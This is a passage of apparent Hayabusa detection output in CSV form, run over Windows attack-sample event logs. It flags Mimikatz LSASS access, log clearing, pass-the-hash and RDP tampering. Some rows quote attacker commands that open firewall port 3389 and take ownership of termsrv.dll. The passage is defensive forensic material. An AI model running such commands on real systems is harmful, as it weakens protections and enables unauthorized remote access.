Creation,,rules/sigma/file_event/sysmon_lsass_memory_dump_file_creation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_11_lsass_memdump.evtx +2019-03-18 04:10:03.991 +09:00,PC04.example.corp,10,high,LSASS Memory Dump,,rules/sigma/process_access/sysmon_lsass_memdump.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_11_lsass_memdump.evtx +2019-03-18 04:26:42.116 +09:00,PC04.example.corp,1102,high,Security log was cleared,User: IEUser,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/net_share_drive_5142.evtx +2019-03-18 04:37:11.661 +09:00,PC04.example.corp,10,high,Suspicious GrantedAccess Flags on LSASS Access,,rules/sigma/process_access/win_susp_proc_access_lsass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_lsass_mimikatz_sekurlsa_logonpasswords.evtx +2019-03-18 04:37:11.661 +09:00,PC04.example.corp,10,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_lsass_mimikatz_sekurlsa_logonpasswords.evtx +2019-03-18 04:37:11.661 +09:00,PC04.example.corp,10,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_lsass_mimikatz_sekurlsa_logonpasswords.evtx +2019-03-18 04:37:11.661 +09:00,PC04.example.corp,10,high,Mimikatz Detection LSASS Access,,rules/sigma/deprecated/sysmon_mimikatz_detection_lsass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_lsass_mimikatz_sekurlsa_logonpasswords.evtx +2019-03-18 05:17:52.949 +09:00,PC04.example.corp,1,informational,Process Creation,"Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\Users\IEUser\Desktop\RDPWrap-v1.6.2\install.bat"" : Path: C:\Windows\System32\cmd.exe : User: PC04\IEUser : Parent Command: C:\Windows\Explorer.EXE",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sysmon_13_rdp_settings_tampering.evtx +2019-03-18 05:17:52.979 +09:00,PC04.example.corp,1,informational,Process Creation,"Command: ""C:\Users\IEUser\Desktop\RDPWrap-v1.6.2\RDPWInst"" -i -o : Path: C:\Users\IEUser\Desktop\RDPWrap-v1.6.2\RDPWInst.exe : User: PC04\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\Users\IEUser\Desktop\RDPWrap-v1.6.2\install.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sysmon_13_rdp_settings_tampering.evtx +2019-03-18 05:18:05.086 +09:00,PC04.example.corp,13,high,RDP Sensitive Settings Changed,,rules/sigma/registry_event/sysmon_rdp_settings_hijack.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sysmon_13_rdp_settings_tampering.evtx +2019-03-18 05:18:09.282 +09:00,PC04.example.corp,13,high,RDP Registry Modification,,rules/sigma/registry_event/sysmon_rdp_registry_modification.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sysmon_13_rdp_settings_tampering.evtx +2019-03-18 05:18:09.282 +09:00,PC04.example.corp,13,high,RDP Sensitive Settings Changed,,rules/sigma/registry_event/sysmon_rdp_settings_hijack.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sysmon_13_rdp_settings_tampering.evtx +2019-03-18 05:18:09.312 +09:00,PC04.example.corp,1,informational,Process Creation,"Command: netsh advfirewall firewall add rule name=""Remote Desktop"" dir=in protocol=tcp localport=3389 profile=any action=allow : Path: C:\Windows\System32\netsh.exe : User: PC04\IEUser : Parent Command: ""C:\Users\IEUser\Desktop\RDPWrap-v1.6.2\RDPWInst"" -i -o",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sysmon_13_rdp_settings_tampering.evtx +2019-03-18 05:18:09.312 +09:00,PC04.example.corp,1,medium,Netsh Port or Application Allowed,,rules/sigma/process_creation/win_netsh_fw_add.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sysmon_13_rdp_settings_tampering.evtx +2019-03-18 05:18:09.312 +09:00,PC04.example.corp,1,high,Netsh RDP Port Opening,,rules/sigma/process_creation/win_netsh_allow_port_rdp.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sysmon_13_rdp_settings_tampering.evtx +2019-03-18 05:18:09.643 +09:00,PC04.example.corp,1,informational,Process Creation,"Command: C:\Windows\System32\rundll32.exe shell32.dll,SHCreateLocalServerRunDll {995C996E-D918-4a8c-A302-45719A6F4EA7} -Embedding : Path: C:\Windows\System32\rundll32.exe : User: PC04\IEUser : Parent Command: C:\Windows\system32\svchost.exe -k DcomLaunch",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sysmon_13_rdp_settings_tampering.evtx +2019-03-18 05:18:12.096 +09:00,PC04.example.corp,1,informational,Process Creation,Command: UI0Detect.exe 220 : Path: C:\Windows\System32\UI0Detect.exe : User: PC04\IEUser : Parent Command: C:\Windows\system32\UI0Detect.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sysmon_13_rdp_settings_tampering.evtx +2019-03-18 05:20:14.512 +09:00,PC04.example.corp,1,informational,Process Creation,"Command: ""C:\Users\IEUser\Desktop\UniversalTermsrvPatch_20090425\UniversalTermsrvPatch_20090425\UniversalTermsrvPatch-x86.exe"" : Path: C:\Users\IEUser\Desktop\UniversalTermsrvPatch_20090425\UniversalTermsrvPatch_20090425\UniversalTermsrvPatch-x86.exe : User: PC04\IEUser : Parent Command: C:\Windows\Explorer.EXE",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sysmon_13_rdp_settings_tampering.evtx +2019-03-18 05:20:17.907 +09:00,PC04.example.corp,1,informational,Process Creation,"Command: ""C:\Windows\System32\takeown.exe"" /f C:\Windows\System32\termsrv.dll : Path: C:\Windows\System32\takeown.exe : User: PC04\IEUser : Parent Command: ""C:\Users\IEUser\Desktop\UniversalTermsrvPatch_20090425\UniversalTermsrvPatch_20090425\UniversalTermsrvPatch-x86.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sysmon_13_rdp_settings_tampering.evtx +2019-03-18 05:20:17.917 +09:00,PC04.example.corp,1,informational,Process Creation,"Command: ""C:\Windows\System32\icacls.exe"" C:\Windows\System32\termsrv.dll /grant %%username%%:F : Path: C:\Windows\System32\icacls.exe : User: PC04\IEUser : Parent Command: ""C:\Users\IEUser\Desktop\UniversalTermsrvPatch_20090425\UniversalTermsrvPatch_20090425\UniversalTermsrvPatch-x86.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sysmon_13_rdp_settings_tampering.evtx +2019-03-18 05:20:17.917 +09:00,PC04.example.corp,1,medium,File or Folder Permissions Modifications,,rules/sigma/process_creation/win_file_permission_modifications.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sysmon_13_rdp_settings_tampering.evtx +2019-03-18 05:20:17.927 +09:00,PC04.example.corp,1,informational,Process Creation,"Command: ""C:\Windows\System32\icacls.exe"" C:\Windows\System32\termsrv.dll /grant *S-1-1-0:(F) : Path: C:\Windows\System32\icacls.exe : User: PC04\IEUser : Parent Command: ""C:\Users\IEUser\Desktop\UniversalTermsrvPatch_20090425\UniversalTermsrvPatch_20090425\UniversalTermsrvPatch-x86.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sysmon_13_rdp_settings_tampering.evtx +2019-03-18 05:20:17.927 +09:00,PC04.example.corp,1,medium,File or Folder Permissions Modifications,,rules/sigma/process_creation/win_file_permission_modifications.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sysmon_13_rdp_settings_tampering.evtx +2019-03-18 05:23:12.188 +09:00,PC04.example.corp,1,informational,Process Creation,Command: UI0Detect.exe 220 : Path: C:\Windows\System32\UI0Detect.exe : User: PC04\IEUser : Parent Command: C:\Windows\system32\UI0Detect.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sysmon_13_rdp_settings_tampering.evtx +2019-03-18 05:43:12.784 +09:00,PC04.example.corp,1,informational,Process Creation,Command: UI0Detect.exe 220 : Path: C:\Windows\System32\UI0Detect.exe : User: PC04\IEUser : Parent Command: C:\Windows\system32\UI0Detect.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_13_keylogger_directx.evtx +2019-03-18 05:43:16.309 +09:00,PC04.example.corp,1,informational,Process Creation,Command: C:\Windows\System32\slui.exe -Embedding : Path: C:\Windows\System32\slui.exe : User: PC04\IEUser : Parent Command: C:\Windows\system32\svchost.exe -k DcomLaunch,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_13_keylogger_directx.evtx +2019-03-18 20:06:25.485 +09:00,PC01.example.corp,1102,high,Security log was cleared,User: user01,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_4624_mimikatz_sekurlsa_pth_source_machine.evtx +2019-03-18 20:06:29.911 +09:00,PC01.example.corp,4624,informational,Logon Type 9 - NewCredentials,User: user01 : Workstation: : IP Address: ::1 : Port: 0 : LogonID: 0x4530f0f : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-9-NewInteractive.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_4624_mimikatz_sekurlsa_pth_source_machine.evtx +2019-03-18 20:06:29.911 +09:00,PC01.example.corp,4672,informational,Admin Logon,User: user01 : LogonID: 0x4530f0f,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_4624_mimikatz_sekurlsa_pth_source_machine.evtx +2019-03-18 20:06:29.911 +09:00,PC01.example.corp,4624,medium,Pass the Hash Activity 2,,rules/sigma/builtin/security/win_pass_the_hash_2.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_4624_mimikatz_sekurlsa_pth_source_machine.evtx +2019-03-18 20:06:29.911 +09:00,PC01.example.corp,4624,high,Successful Overpass the Hash Attempt,,rules/sigma/builtin/security/win_overpass_the_hash.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_4624_mimikatz_sekurlsa_pth_source_machine.evtx +2019-03-18 20:27:00.438 +09:00,PC01.example.corp,1102,high,Security log was cleared,User: user01,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_WMIC_4648_rpcss.evtx +2019-03-18 20:27:23.231 +09:00,PC01.example.corp,4648,informational,Explicit Logon,Source User: user01 : Target User: administrator : IP Address: - : Process: C:\Windows\System32\svchost.exe : Target Server: RPCSS/WIN-77LTAPHIQ1R.example.corp,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_WMIC_4648_rpcss.evtx +2019-03-18 20:27:23.261 +09:00,PC01.example.corp,4648,medium,Explicit Logon: Suspicious Process,Source User: user01 : Target User: administrator : IP Address: - : Process: C:\Windows\System32\wbem\WMIC.exe : Target Server: host/WIN-77LTAPHIQ1R.example.corp,rules/hayabusa/default/alerts/Security/4648_ExplicitLogonSuspiciousProcess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_WMIC_4648_rpcss.evtx +2019-03-18 20:27:23.261 +09:00,PC01.example.corp,4648,medium,Suspicious Remote Logon with Explicit Credentials,,rules/sigma/builtin/security/win_susp_logon_explicit_credentials.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_WMIC_4648_rpcss.evtx +2019-03-18 20:27:23.271 +09:00,PC01.example.corp,4648,medium,Explicit Logon: Suspicious Process,Source User: user01 : Target User: administrator : IP Address: - : Process: C:\Windows\System32\wbem\WMIC.exe : Target Server: WIN-77LTAPHIQ1R.example.corp,rules/hayabusa/default/alerts/Security/4648_ExplicitLogonSuspiciousProcess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_WMIC_4648_rpcss.evtx +2019-03-18 20:27:23.271 +09:00,PC01.example.corp,4648,medium,Suspicious Remote Logon with Explicit Credentials,,rules/sigma/builtin/security/win_susp_logon_explicit_credentials.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_WMIC_4648_rpcss.evtx +2019-03-18 23:23:22.264 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:22.284 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Program Files\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:22.284 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.356 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: BGinfo : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.546 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.546 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Public\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.556 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\account$ : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.556 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\account$\Contacts\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.556 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\account$\Desktop\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.556 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\account$\Documents\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.566 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\account$\Downloads\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.566 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\account$\Favorites\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.566 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\account$\Links\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.566 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\account$\Music\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.566 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\account$\Pictures\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.576 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\account$\Saved Games\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.576 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\account$\Searches\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.576 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\account$\Videos\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.576 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\account$\Contacts : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.586 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\account$\Desktop : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.586 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\account$\Documents : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.586 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\account$\Downloads : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.586 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\account$\Favorites : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.586 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\account$\Favorites\Links\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.586 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\account$\Favorites\Links for United States\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.596 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\account$\Favorites\Links : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.596 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\account$\Favorites\Links for United States : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.596 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\account$\Links : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.596 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\account$\Music : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.596 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\account$\Pictures : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.606 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\account$\Saved Games : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.606 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\account$\Searches : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.606 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\account$\Videos : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.606 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admin01 : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.606 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admin01\Contacts\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.616 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admin01\Desktop\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.616 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admin01\Documents\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.616 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admin01\Downloads\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.616 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admin01\Favorites\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.616 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: 